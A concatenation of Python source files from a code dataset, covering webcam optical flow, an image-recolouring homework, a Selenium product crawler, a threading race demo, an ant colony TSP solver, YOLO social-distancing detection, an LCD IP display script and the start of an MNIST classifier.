2)\n lines = np.int32(lines + 0.5)\n vis = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\n cv.polylines(vis, lines, 0, (0, 255, 0))\n for (x1, y1), (_x2, _y2) in lines:\n cv.circle(vis, (x1, y1), 1, (0, 255, 0), -1)\n return vis\n\n\ndef recording_setup_Windows(dir_original, dir_opt_flow):\n time_stamp = strftime(\"%Y-%m-%d_%H_%M_%S\", time.localtime(time.time()))\n\n #file_test = open(os.path.join(dir_original, 'original_' + time_stamp + '.avi'), 'w')\n #file_test.write(\"Hello\")\n #file_test.close()\n fourcc = cv.VideoWriter_fourcc(*'XVID')\n out_original = cv.VideoWriter(os.path.join(dir_original, 'original_' + time_stamp + '.avi'), fourcc, 8.0, (640, 480))\n out_opt_flow = cv.VideoWriter(os.path.join(dir_opt_flow, 'opt_flow' + time_stamp + '.avi'), fourcc, 8.0,\n (640, 480)) # set file to write processed frames with optical flow\n # out_original = cv.VideoWriter('original_' + time_stamp + '.avi', fourcc, 8.0,(640, 480))\n # out_opt_flow = cv.VideoWriter( 'opt_flow_' + time_stamp + '.avi', fourcc, 8.0,(640, 480))\n # changed FPS from 20 to 8\n return out_original, out_opt_flow\n\ndef make_decision_Areas_method(new_frame):\n frame_HSV = cv.cvtColor(new_frame, cv.COLOR_BGR2HSV) # convert to HSV\n frame_threshold = cv.inRange(frame_HSV, (0, 58, 140), (57, 255, 255))\n ret, thresh = cv.threshold(frame_threshold, 50, 255, cv.THRESH_BINARY)\n contours, hierarchy = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n #print ( len(contours) )\n areas = []\n centers = []\n for contour in contours:\n areas.append( cv.contourArea(contour) )\n\n x, y, w, h = cv.boundingRect(contour) # then coordinate and height and width of the bounding box\n centers.append( x + (w/2))\n cv.rectangle(new_frame, (x, 
y), (x + w, y + h), (255, 0, 0), 2)\n\n    if ( len(contours) ) >= 5 and max(areas) > 5000:\n        if np.median(centers) <= 320:\n            decision = \"left\"\n            print(\"turn left\")\n        elif np.median(centers) > 320:\n            decision = \"right\"\n            print(\"turn right\")\n    else:\n        decision = \"0\"\n\n    return decision\n\n# END of definitions\n\n\n# RECORDING VIDEO SETUP\ndir_original = 'ORIGINAL' #\ndir_opt_flow = 'OPT_FLOW'\n\nout_original, out_opt_flow = recording_setup_Windows(dir_original, dir_opt_flow)\n\ncam = cv.VideoCapture(0)\n\nret, prev = cam.read() # reads a frame from camera\nh, w = prev.shape[:2] # gets height and width of the image (in pixels)\nprevgray = cv.cvtColor(prev, cv.COLOR_BGR2GRAY) # converts image to grayscale (needed for processing)\n\nfr_count = 0\nwhile True:\n    fr_count += 1\n    ret, img = cam.read() # reads NEXT frame from camera (because we need both previous and next to analyze flow)\n    gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n    flow = cv.calcOpticalFlowFarneback(prevgray, gray, None, 0.6, 5, 15, 3, 5, 1.2, 0)\n    #if fr_count == 1:\n        #print(len(flow[0]))\n    # flow is the array that contains x and y displacements of ALL the pixels. if no movements, displacements are 0\n    # you can see that to get the flow, we need to pass 2 images - prevgray and gray\n    prevgray = gray # now \"current\" image becomes \"previous\"\n    new_frame = draw_flow(gray, flow) # this one just creates image with green dots on it, for illustration purposes\n\n    make_decision_Areas_method(new_frame)\n\n    # if max(ldx) > threshold: # because it's the LEFT half of the image, we should avoid if there is rightward movement (positive displacement)\n    #     print(\"turn right\")\n    #     cv.putText(new_frame, \"turn right!\", (10, 50), cv.FONT_HERSHEY_PLAIN, 3, (255, 255, 255))\n    #\n    #\n    # if min(ldx) < threshold * (-1): # because it's the right half of the image, we should avoid if there is leftward movement (negative displacement)\n    #     print(\"turn left\")\n    #     cv.putText(new_frame, \"turn left!\", (400, 50), cv.FONT_HERSHEY_PLAIN, 3, (255, 255, 255))\n#----------------------------------------------------------------------------------------------------\n    out_original.write(img)\n    out_opt_flow.write(new_frame)\n    #out.write(new_frame)\n    cv.imshow(\"OpticalFlow\", new_frame) # displaying image with flow on it, for illustration purposes\n    #cv.imshow(\"Original\", img)\n    #cv.imwrite('frame' + str(fr_count) + '.jpg', new_frame)\n\n    key = cv.waitKey(30)\n    if key == ord('q'):\n        out_opt_flow.release()\n        out_original.release()\n        break\n\nprint(\"Landing\")\n\n","sub_path":"Area_An_No_Drone.py","file_name":"Area_An_No_Drone.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"461196892","text":"'''\r\n\r\nWe define as adjacent to a pixel p of an image the pixels next to p horizontally or vertically.\r\nIf a pixel is on the border of the image, its neighbourhood does not include the pixels that lie outside the image.\r\nThe pixel of the image with coordinates (x,y) therefore has as adjacent pixels the pixels\r\nwith coordinates (x-1,y),(x+1,y),(x,y-1),(x,y+1) that belong to the image. 
\r\ndef trov_estr(img,x,y,col):\r\n    # (reconstructed: the original body was lost to markup stripping; rebuilt\r\n    # from the call in ricolora below, which uses the returned bounds\r\n    # fine_c (last column) and fine_r (last row) of the same-coloured run)\r\n    fine_c=x\r\n    for c in range(0,len(img[0])):\r\n        if (x+c)<len(img[0]) and img[y][x+c]==col:\r\n            fine_c=x+c\r\n    fine_r=y\r\n    for r in range(0,len(img)):\r\n        if (y+r)<len(img) and img[y+r][x]==col:\r\n            fine_r=y+r\r\n    return fine_c,fine_r\r\n\r\n
def colora_bordo(img,x,y,h,l,c1,c2):\r\n    # (the signature and the branches lost to markup stripping are\r\n    # reconstructed from the surviving fragments and the call in ricolora)\r\n    perimetro=0\r\n    cor_x=x\r\n    cor_y=y\r\n    while y-1>=0:\r\n        if img[y-1][h]==c1:\r\n            img[y-1][h]=c2\r\n            y-=1\r\n            perimetro+=1\r\n        else:\r\n            break\r\n    while x-1>=0:\r\n        if img[l][x-1]==c1:\r\n            img[l][x-1]=c2\r\n            x-=1\r\n            perimetro+=1\r\n        else:\r\n            break\r\n    for i in range(0,l+1):\r\n        if (cor_y+i)<len(img):\r\n            if img[cor_y+i][x]==c1:\r\n                img[cor_y+i][x]=c2\r\n                perimetro+=1\r\n    for k in range(0,l+1):\r\n        if (cor_y-k)>=0:\r\n            if img[cor_y-k][x]==c1:\r\n                img[cor_y-k][x]=c2\r\n                perimetro+=1\r\n    for g in range(0,h+1):\r\n        if (cor_x+g)<len(img[0]):\r\n            if img[y][cor_x+g]==c1:\r\n                img[y][cor_x+g]=c2\r\n                perimetro+=1\r\n    for j in range(0,h+1):\r\n        if (cor_x-j)>=0:\r\n            if img[y][cor_x-j]==c1:\r\n                img[y][cor_x-j]=c2 \r\n                perimetro+=1\r\n    return perimetro\r\n\r\n\r\n \r\n \r\n
def ricolora(fname, lista, fnameout):\r\n    '''Implement the function here'''\r\n    img=apri_file(fname)\r\n    img2=img.copy()\r\n    ris=[] \r\n    for i in range(0,len(lista)):\r\n        area=0\r\n        perimetro=0\r\n        x=lista[i][0]\r\n        y=lista[i][1]\r\n        col_nuovo=lista[i][2]\r\n        
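# each quadruple unpacks as (x, y, fill colour c1, border colour c2)\r\n        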
col_bordo=lista[i][3]\r\n        col_pixel=img[y][x]\r\n        fine_c,fine_r=trov_estr(img,x,y,col_pixel)\r\n        area+=colora_vicini(img,img2,x,y,col_pixel,col_nuovo)\r\n        for n in range(0,len(img)):\r\n            area-=colora_vicini(img,img2,x,y,col_pixel,col_nuovo)\r\n            if (y+n)< fine_r:\r\n                area+=colora_vicini(img,img2,x,y+n,col_pixel,col_nuovo)\r\n                \r\n                for m in range(0,len(img[0])):\r\n                    if (x+m)<=fine_c:\r\n                        area+=colora_vicini(img,img2,x+m,y+n,col_pixel,col_nuovo)\r\n                        area-=colora_vicini(img,img2,x+m,y,col_pixel,col_nuovo)\r\n                        \r\n                    if (x-m)>=0:\r\n                        area+=colora_vicini(img,img2,x-m,y+n,col_pixel,col_nuovo)\r\n                        area-=colora_vicini(img,img2,x-m,y,col_pixel,col_nuovo)\r\n                        \r\n            if (y-n)>=0:\r\n                area+=colora_vicini(img,img2,x,y-n,col_pixel,col_nuovo)\r\n\r\n                for m in range(0,len(img[0])):\r\n                    if (x+m)<=fine_c:\r\n                        area+=colora_vicini(img,img2,x+m,y-n,col_pixel,col_nuovo)\r\n                        \r\n                        area-=colora_vicini(img,img2,x+m,y,col_pixel,col_nuovo)\r\n                    if (x-m)>=0:\r\n                        area+=colora_vicini(img,img2,x-m,y-n,col_pixel,col_nuovo)\r\n                        \r\n                        area-=colora_vicini(img,img2,x-m,y,col_pixel,col_nuovo)\r\n        perimetro=colora_bordo(img,x,y,fine_c,fine_r,col_nuovo,col_bordo)\r\n        a=area-perimetro\r\n        ris+=[(a,perimetro)]\r\n    save(img,fnameout)\r\n    return ris\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n","sub_path":"students/1743829/homework03/program03.py","file_name":"program03.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"193818154","text":"# Section 06-2\r\n# Selenium\r\n# Selenium practice (2) - practice project (1)\r\n\r\n# import selenium\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom bs4 import BeautifulSoup\r\nfrom io import BytesIO\r\nimport urllib.request as req\r\nimport time\r\nimport xlsxwriter\r\n\r\n\r\n\r\nchrome_options = Options()\r\nchrome_options.add_argument(\"--headless\")\r\n\r\n# declare the Excel workbook\r\nworkbook = xlsxwriter.Workbook('D:/crawl-test/crawling_results.xlsx')\r\n\r\n# worksheet\r\nworksheet = workbook.add_worksheet()\r\n\r\n# webdriver setup (Chrome, Firefox, etc.) - headless mode\r\nbrowser = webdriver.Chrome('./webdriver/chromedriver.exe', options = chrome_options)\r\n# webdriver setup (Chrome, Firefox, etc.) - normal mode\r\n# browser = webdriver.Chrome('./webdriver/chromedriver.exe')\r\n\r\n# implicit wait inside the Chrome browser\r\nbrowser.implicitly_wait(3)\r\n\r\n# browser size\r\nbrowser.set_window_size(1920, 1080) # maximize_window() minimize_window()\r\n\r\n# navigate to the page\r\nbrowser.get('http://prod.danawa.com/list/?cate=112758&15main_11_02')\r\n\r\n# first page contents\r\n# print('Before Page Contents : {}'.format(browser.page_source))\r\n\r\n# click 'show more makers', method 1\r\n# explicit wait\r\nWebDriverWait(browser, 3).until(EC.presence_of_element_located((By.XPATH,'//*[@id=\"dlMaker_simple\"]/dd/div[2]/button[1]'))).click()\r\n\r\n# click 'show more makers', method 2\r\n# time.sleep(2)\r\n# browser.find_element_by_xpath('//*[@id=\"dlMaker_simple\"]/dd/div[2]/button[1]').click()\r\n\r\n# click the desired maker category\r\nWebDriverWait(browser, 2).until(EC.presence_of_element_located((By.XPATH,'//*[@id=\"selectMaker_simple_priceCompare_A\"]/li[12]/label'))).click()\r\n\r\n# second page contents\r\n# print('After Page Contents : {}'.format(browser.page_source))\r\n\r\ntime.sleep(3)\r\n\r\n# current page\r\ncur_page = 1\r\n\r\n# number of pages to crawl\r\ntarget_crawl_num = 3\r\n\r\n# Excel row counter\r\ninsert_cnt = 1\r\n\r\n
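# Illustrative helper (added; not used below): the explicit-wait-then-click\r\n# pattern repeated in this script can be factored out like this.\r\ndef wait_and_click(driver, xpath, timeout=3):\r\n    # wait until the element is present in the DOM, then click it\r\n    WebDriverWait(driver, timeout).until(\r\n        EC.presence_of_element_located((By.XPATH, xpath))).click()\r\n\r\n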
while cur_page <= target_crawl_num:\r\n\r\n    # initialize bs4\r\n    soup = BeautifulSoup(browser.page_source, 'html.parser')\r\n\r\n    # prettified source code (debug)\r\n    # print(soup.prettify())\r\n\r\n    # select the main product list\r\n    pro_list = soup.select('div.main_prodlist.main_prodlist_list > ul > li') \r\n\r\n\r\n    # show the current page\r\n    print(\"Current page : {}\".format(cur_page))\r\n    print()\r\n\r\n    # extract the needed information\r\n    for v in pro_list:\r\n        if not v.find('div', class_ = \"ad_header\"):\r\n\r\n            prod_name = v.select('p.prod_name > a')[0].text.strip()\r\n            prod_price = v.select('p.price_sect > a')[0].text.strip()\r\n\r\n            # image\r\n            img_data = BytesIO(req.urlopen(v.select('a.thumb_link > img')[0]['data-original']).read())\r\n\r\n            # print(v.select('p.prod_name > a')[0].text.strip())\r\n            # print(v.select('a.thumb_link > img')[0]['src'])\r\n            # print(v.select('p.price_sect > a')[0].text.strip())\r\n\r\n            # save to Excel (text)\r\n            worksheet.write('A%s'% insert_cnt, prod_name)\r\n            worksheet.write('B%s'% insert_cnt, prod_price)\r\n            # save to Excel (image)\r\n            worksheet.insert_image('C%s'% insert_cnt, prod_name, {'image_data' : img_data})\r\n\r\n            insert_cnt += 1\r\n\r\n    print()\r\n    print()\r\n\r\n    # save a screenshot of each page\r\n    browser.save_screenshot('D:/crawl-test/target-page{}.png'.format(cur_page))\r\n\r\n    # advance the page\r\n    cur_page += 1\r\n\r\n    if cur_page > target_crawl_num:\r\n        print('Done')\r\n        break\r\n\r\n    # go to the next page\r\n    WebDriverWait(browser, 3).until(EC.presence_of_element_located((By.CSS_SELECTOR,'div.number_wrap > a:nth-child({})'.format(cur_page)))).click()\r\n\r\n    # delete the BeautifulSoup instance\r\n    del soup\r\n\r\n    # wait 3 seconds\r\n    time.sleep(3)\r\n\r\n    \r\n\r\n# quit the browser\r\nbrowser.quit()\r\n\r\n# close the Excel file\r\nworkbook.close()","sub_path":"section06-2.py","file_name":"section06-2.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"338840354","text":"from threading import Thread\n\na = 0\n\n\ndef function(arg):\n    global a\n    for _ in range(arg):\n        a += 1\n\n\ndef main():\n    threads = []\n    for i in range(5):\n        thread = Thread(target=function, args=(1000000,))\n        thread.start()\n        threads.append(thread)\n\n    [t.join() for t in threads]\n    print(\"----------------------\", a)  # ??? usually less than 5000000: a += 1 is not atomic, so concurrent updates are lost\n\n\nmain()","sub_path":"tread_handling.py","file_name":"tread_handling.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"551055956","text":"import numpy as ny\nimport random\nimport matplotlib.pyplot as plt\nfrom numba import jit\n\n''' Ant colony algorithm for the travelling salesman problem (TSP) '''\n\n
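\n# Illustrative sketch (added for clarity; not used by the class below): the\n# selection weight an ant assigns to a candidate city combines pheromone and\n# inverse distance, each raised to the weight exponents configured on the class.\ndef _transition_weight(pheromone, distance, message_weight=1, distance_weight=1):\n    # weight = tau^alpha * (1/d)^beta\n    return ny.power(pheromone, message_weight) * ny.power(1.0 / distance, distance_weight)\n\n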
\n# ant colony optimization algorithm\nclass AntOptimization:\n    # number of cities\n    __city_count = 0\n    # set of cities\n    __city_set = 0\n    # number of ants\n    __ant_count = 0\n    # city distance matrix\n    __city_distance = 0\n    # pheromone matrix\n    __city_message = 0\n    # set of ant paths\n    __ants = 0\n    # best ant path\n    __bast_ant = 0\n    # stagnation counter\n    __loop_count = 0\n    # maximum stagnation count\n    __max_loop_times = 100\n    # minimum pheromone value\n    __min_message = 0.01\n    # maximum pheromone value\n    __max_message = 100\n    # ant count multiplier\n    __ant_power = 0.5\n    # pheromone weight for selection\n    __message_weight = 1\n    # distance weight for selection\n    __distance_weight = 1\n\n    # initialization\n    def __init__(self, city_count=30):\n        _data = [(41, 94), (37, 84), (54, 67), (25, 62), (7, 64),\n                 (2, 99), (68, 58), (71, 44), (54, 62), (83, 69),\n                 (64, 60), (18, 54), (22, 60), (83, 46), (91, 38),\n                 (25, 38), (24, 42), (58, 69), (71, 71), (74, 78),\n                 (87, 76), (18, 40), (13, 40), (82, 7), (62, 32),\n                 (58, 35), (45, 21), (41, 26), (44, 35), (4, 50)\n                 ]\n        if city_count == 30:\n            self.__city_set = ny.asarray(_data).T\n        else:\n            self.__city_set = ny.random.randint(1, 50, [2, city_count])\n        print(self.__city_set)\n        self.__city_count = city_count\n        self.__ant_count = int(city_count * self.__ant_power)\n        self.__city_distance = ny.zeros([self.__city_count, self.__city_count], dtype=float) * 10\n        self.cal_distance()\n        self.__city_message = ny.ones([self.__city_count, self.__city_count], dtype=float) * self.__min_message\n        self.__ants = ny.zeros([self.__ant_count, self.__city_count], dtype=int)\n        self.__bast_ant = ny.arange(city_count)\n        self.draw(save_times=-1, save_ant=-1)\n\n    # compute the distance between every pair of cities\n    def cal_distance(self):\n        for i in range(self.__city_count):\n            for j in range(self.__city_count):\n                a = self.__city_set[:, i]\n                b = self.__city_set[:, j]\n                x = a[0] - b[0]\n                y = a[1] - b[1]\n                self.__city_distance[i, j] = ny.sqrt(x ** 2 + y ** 2)\n\n    # add pheromone along a path\n    def add_message(self, ant_way, k=1):\n        way = list(ant_way)\n        for i in range(self.__city_count - 1):\n            now_city = way[i]\n            next_city = way[i + 1]\n            self.__city_message[now_city, next_city] += k / self.__city_distance[now_city, next_city]\n            if self.__city_message[now_city, next_city] > self.__max_message:\n                self.__city_message[now_city, next_city] = self.__max_message\n            elif self.__city_message[now_city, next_city] < self.__min_message:\n                self.__city_message[now_city, next_city] = self.__min_message\n            self.__city_message[next_city, now_city] = self.__city_message[now_city, next_city]\n\n    # ant ant_index selects the next city\n    # _visit: how many cities have been visited so far\n    # city: the set of unvisited cities\n    def ant_select_city(self, ant_index, _visit, city):\n        # get the current city now_city\n        now_city = self.__ants[ant_index, _visit - 1]\n        # selection weight of each candidate city, p_city\n        p_city = ny.zeros(len(city), dtype=float)\n        for i in range(len(city)):\n            city_index = city[i]\n            # walk the candidate set and compute the weights\n            p_city[i] = ny.power(self.__city_message[now_city, city_index], self.__message_weight) * ny.power(\n                (1 / self.__city_distance[now_city, city_index]), self.__distance_weight)\n        '''\n        # select the next city by a random binary tournament\n        a = random.randint(0, len(city) - 1)\n        b = random.randint(0, len(city) - 1)\n        if p_city[a] > p_city[b]:\n            next_city = a\n        else:\n            next_city = b\n        '''\n        # no randomness here\n        # just pick the best city directly\n        # (′д` )…彡…彡\n        _city = list(p_city)\n        next_city = _city.index(max(_city))\n        next_city = city[next_city]\n        self.__ants[ant_index, _visit] = next_city\n        self.__city_message[now_city, next_city] += 1 / self.__city_distance[now_city, next_city]\n        if self.__city_message[now_city, next_city] > self.__max_message:\n            self.__city_message[now_city, next_city] = self.__max_message\n        elif self.__city_message[now_city, next_city] < self.__min_message:\n            self.__city_message[now_city, next_city] = self.__min_message\n        self.__city_message[next_city, now_city] = self.__city_message[now_city, next_city]\n\n    # ant ant_index extends its path\n    def ant_select(self, ant_index, _visit):\n        if _visit == 0:\n            # first step: pick a random start city\n            random_city = random.randint(0, self.__city_count - 1)\n            self.__ants[ant_index, _visit] = random_city\n        else:\n            # compute the set of remaining cities\n            city = range(self.__city_count)\n            city = [x for x in city if x not in self.__ants[ant_index, 1:_visit]]\n            # city.remove(self.__ants[ant_index, 1:_visit])\n            # pick the next city\n            self.ant_select_city(ant_index, _visit, city)\n\n    # compute the length of a path\n    def cal_length(self, _ants):\n        _sum = 0\n        _ants = list(_ants)\n        _ants.append(_ants[0])\n        for i in range(self.__city_count):\n            now_city = _ants[i]\n            next_city = _ants[i + 1]\n            _sum += self.__city_distance[now_city, next_city]\n        return _sum\n\n
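    # Note: cal_length closes the tour (the ant returns to its start city),\n    # so the reported length is a full TSP cycle, not an open path.\n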
    # store the best path\n    def save_ant(self, save_times=0):\n        _bast = self.cal_length(self.__bast_ant)\n        for i in range(self.__ant_count):\n            _now = self.cal_length(self.__ants[i, :])\n            if _now < _bast:\n                self.__loop_count = 0\n                _bast = _now\n                self.__bast_ant = list(self.__ants[i, :])\n                self.draw(save_times=save_times, save_ant=i)\n            else:\n                self.__loop_count += 1\n                # stagnation has reached the threshold\n                if self.__loop_count / self.__ant_count >= self.__max_loop_times:\n                    # reset the pheromone matrix\n                    print(\"clear\")\n                    self.__city_message *= 0\n                    self.__loop_count = 0\n\n    # run\n    def run(self, times):\n        for now_time in range(times + 1):\n            # pheromone evaporation\n            self.__city_message *= 0.7\n            # reset the ant paths\n            self.__ants *= 0\n            for city_visit in range(self.__city_count):\n                # visit the city_visit-th city\n                for i in range(self.__ant_count):\n                    # ant i extends its path\n                    self.ant_select(i, city_visit)\n            for i in range(self.__ant_count):\n                self.add_message(self.__ants[i, :], 1)\n            print(\">>>{}\".format(now_time + 1))\n            self.save_ant(save_times=now_time)\n            # self.add_message(self.__bast_ant, 1)\n\n    # plot the result\n    def draw(self, save_times=0, save_ant=0, show=False):\n        save_times += 1\n        save_ant += 1\n        draw_point = self.__city_set[:, self.__bast_ant]\n        x = list(draw_point[0, :])\n        y = list(draw_point[1, :])\n        x.append(x[0])\n        y.append(y[0])\n        plt.plot(x, y)\n        plt.title(self.cal_length(self.__bast_ant).__str__())\n        plt.savefig(\"image\\\\times_\" + save_times.__str__() + \"_\" + save_ant.__str__())\n        if show:\n            plt.show()\n        else:\n            plt.close()\n\n\nant = AntOptimization(30)\nant.run(times=100)\n","sub_path":"Ant/Ant.py","file_name":"Ant.py","file_ext":"py","file_size_in_byte":7729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"218710030","text":"import numpy as np\r\nimport cv2\r\nimport math\r\nfrom itertools import combinations\r\n\r\nvideo_stream = cv2.VideoCapture(0)\r\ndef dist1(x, y):\r\n    dist = math.sqrt((x**2)+ (y**2))\r\n    return (dist)\r\n\r\nwhile True:\r\n    ret, current_frame = video_stream.read()\r\n    img_to_detect = current_frame\r\n    img_height = img_to_detect.shape[0]\r\n    img_width = img_to_detect.shape[1]\r\n\r\n    img_blob = cv2.dnn.blobFromImage(img_to_detect, 0.003922, (416,416), swapRB=True, crop=False)\r\n    class_labels = [\"person\", \"bicycle\", \"car\", \"motorcycle\", \"airplane\", \"bus\", \"train\", \"truck\", \"boat\",\r\n                    \"trafficlight\", \"firehydrant\", \"stopsign\", \"parkingmeter\", \"bench\", \"bird\", \"cat\",\r\n                    \"dog\", \"horse\", \"sheep\", \"cow\", \"elephant\", \"bear\", \"zebra\", \"giraffe\", \"backpack\",\r\n                    \"umbrella\", \"handbag\", \"tie\", \"suitcase\", \"frisbee\", \"skis\", \"snowboard\", \"sportsball\",\r\n                    \"kite\", \"baseballbat\", \"baseballglove\", \"skateboard\", \"surfboard\", \"tennisracket\",\r\n                    \"bottle\", \"wineglass\", \"cup\", \"fork\", \"knife\", \"spoon\", \"bowl\", \"banana\", \"apple\",\r\n                    \"sandwich\", \"orange\", \"broccoli\", \"carrot\", \"hotdog\", \"pizza\", \"donut\", \"cake\", \"chair\",\r\n                    \"sofa\", \"pottedplant\", \"bed\", \"diningtable\", \"toilet\", \"tvmonitor\", \"laptop\", \"mouse\",\r\n                    \"remote\", \"keyboard\", \"cellphone\", \"microwave\", \"oven\", \"toaster\", \"sink\", \"refrigerator\",\r\n                    \"book\", \"clock\", \"vase\", \"scissors\", \"teddybear\", \"hairdrier\", \"toothbrush\"]\r\n\r\n    class_colors = [\"0,255,0\", \"0,0,255\", \"255,0,0\", \"255,255,0\", \"0,255,255\"]\r\n    class_colors = [np.array(color.split(\",\")).astype(\"int\") for color in class_colors]\r\n    class_colors = np.array(class_colors)\r\n    class_colors = np.tile(class_colors,(16,1))\r\n\r\n    yolo_model = cv2.dnn.readNetFromDarknet('C:/Users/hp/Desktop/Yolo/yolov3.cfg','C:/Users/hp/Desktop/Yolo/yolov3.weights')\r\n\r\n\r\n    yolo_layers = yolo_model.getLayerNames()\r\n    yolo_output_layer = [yolo_layers[yolo_layer[0] - 1] for yolo_layer in 
yolo_model.getUnconnectedOutLayers()]\r\n\r\n yolo_model.setInput(img_blob)\r\n\r\n objection_detection_layers = yolo_model.forward(yolo_output_layer)\r\n\r\n class_ids_list = []\r\n boxes_list = []\r\n confidences_list = []\r\n person_dict = dict()\r\n for objection_detection_layer in objection_detection_layers:\r\n for detection in objection_detection_layer:\r\n all_scores = detection[5:]\r\n predicted_class_id = np.argmax(all_scores)\r\n predicted_confidence = all_scores[predicted_class_id]\r\n\r\n if predicted_confidence > 0.20:\r\n bounding_box = detection[0:4]*np.array([img_width, img_height, img_width, img_height])\r\n (box_center_x_pt, box_center_y_pt, box_width, box_height) = bounding_box.astype(\"int\")\r\n start_x_pt = int(box_center_x_pt - (box_width / 2))\r\n start_y_pt = int(box_center_y_pt - (box_height / 2))\r\n\r\n class_ids_list.append(predicted_class_id)\r\n confidences_list.append(float(predicted_confidence))\r\n boxes_list.append([start_x_pt , start_y_pt, int(box_width), int(box_height)])\r\n\r\n max_values_ids = cv2.dnn.NMSBoxes(boxes_list, confidences_list, 0.5, 0.4)\r\n\r\n for max_values_id in max_values_ids:\r\n max_class_id = max_values_id[0]\r\n if (class_labels[class_ids_list[max_class_id]]==\"person\"):\r\n box = boxes_list[max_class_id]\r\n person_dict[max_class_id] = box[0]+(box[2]/2), box[1]+(box[3]/2), box[0], box[1], box[0]+(box[2]), box[1]+(box[3])\r\n\r\n red_id = []\r\n red_box = []\r\n\r\n for (id1, pt1), (id2, pt2) in combinations(person_dict.items(),2):\r\n dist = dist1((pt1[0]-pt2[0]), (pt1[1]-pt2[1]))\r\n if dist < 75.0:\r\n if id1 not in red_id:\r\n red_id.append(id1)\r\n red_box.append([pt1[2], pt1[3], pt1[4], pt1[5]])\r\n if id2 not in red_id:\r\n red_id.append(id2)\r\n red_box.append([pt2[2], pt2[3], pt2[4], pt2[5]])\r\n cv2.line(img_to_detect,(int(pt1[0]), int(pt1[1])), (int(pt2[0]), int(pt2[1])), (0,0,255),1,cv2.LINE_AA)\r\n\r\n for box in red_box:\r\n cv2.rectangle(img_to_detect,(box[0], box[1]), (box[2], box[3]),(0,0,255),1)\r\n for (id, pt) in person_dict.items():\r\n if id not in red_id:\r\n cv2.rectangle(img_to_detect, (pt[2], pt[3]), (pt[4], pt[5]), (0, 255, 0), 1)\r\n text = \"People at risk: %s\"% str(len(red_box))\r\n\r\n cv2.putText(img_to_detect, text, (10,25), cv2.FONT_HERSHEY_SIMPLEX, 1, (1,1,255), 2, cv2.LINE_AA)\r\n\r\n cv2.imshow(\"Detection Output\", img_to_detect)\r\n\r\n if (cv2.waitKey(1) & 0xFF == ord('q')):\r\n break\r\n\r\nvideo_stream.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"Social_distancing.py","file_name":"Social_distancing.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"31668681","text":"#!/usr/bin/python\n#show IP address on the LCD Plate at startup\n#\nimport subprocess\nimport time\nimport Adafruit_CharLCD as LCD\n\nlogfile = open(\"LCDDisplay.log\", 'a')\nlcd = LCD.Adafruit_CharLCDPlate()\nwhile True:\n\tIPaddr = subprocess.check_output(['hostname','-I'])\n\tif len(IPaddr) > 8:\n\t\tbreak\n\telse:\n\t\ttime.sleep(2)\nName = subprocess.check_output(['hostname']).strip()\ndisplayText = IPaddr + Name\ncurrentTime = \"Running @ \" + time.strftime(\"%c\") + \":\\n\"\nlogfile.write(currentTime)\nlogfile.write(displayText)\nlcd.clear()\nlcd.message(displayText)\nlogfile.close()\n","sub_path":"ipDisplay.py","file_name":"ipDisplay.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"504059082","text":"import 
tensorflow as tf\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"/tmp/data/\", one_hot=True)\n\n
class MNIST_Basic():\n    \"\"\"\n    Basic MNIST For Testing Adversarial Attacks\n    \"\"\"\n    def __init__(self, scope='basic', summaries_dir=None, learning_rate=1e-3):\n        self.learning_rate = learning_rate\n        self.scope = scope\n        self.summary_writer=None\n        with tf.variable_scope(scope):\n            self._build_model()\n            summary_dir = os.path.join(summaries_dir, \"summaries_{}\".format(scope))\n            if summaries_dir:\n                if not os.path.exists(summary_dir):\n                    os.makedirs(summary_dir)\n                self.summary_writer = tf.summary.FileWriter(summary_dir)\n\n\n    def _build_model(self):\n        \"\"\"\n        Builds tf graph\n        \"\"\"\n\n        # Input placeholder\n        self.x = tf.placeholder(shape=[None, 784], dtype=tf.float32, name='x')\n        # Target placeholder\n        self.y = tf.placeholder(shape=[None, 10], dtype=tf.float32, name='y')\n        \n        # Fully connected layer, followed by output layer\n        fc1 = tf.layers.dense(inputs=self.x, units=256, activation=tf.nn.relu)\n        self.logits = tf.layers.dense(inputs=fc1, units=10)\n\n        # Calculate loss\n        self.loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.logits, labels=self.y))\n\n        # Calculate grads for perturbation\n        self.grads = tf.gradients(self.loss, self.x)\n\n        # Optimize loss\n        self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)\n        self.train_op = self.optimizer.minimize(self.loss)\n\n        # Find Accuracy\n        correct_prediction = tf.equal(tf.argmax(self.logits, 1), tf.argmax(self.y, 1))\n        self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n        # Collect Summaries\n        self.summaries = tf.summary.merge([\n            tf.summary.scalar(\"Loss\", self.loss),\n            tf.summary.scalar(\"Accuracy\", self.accuracy)\n        ])\n    \n    def predict(self, sess, x_inp):\n        \"\"\"\n        Returns the logits of the prediction.\n        Args:\n            sess: Tensorflow Session\n            x_inp: input\n        \"\"\"\n        return sess.run(self.logits, feed_dict={self.x: 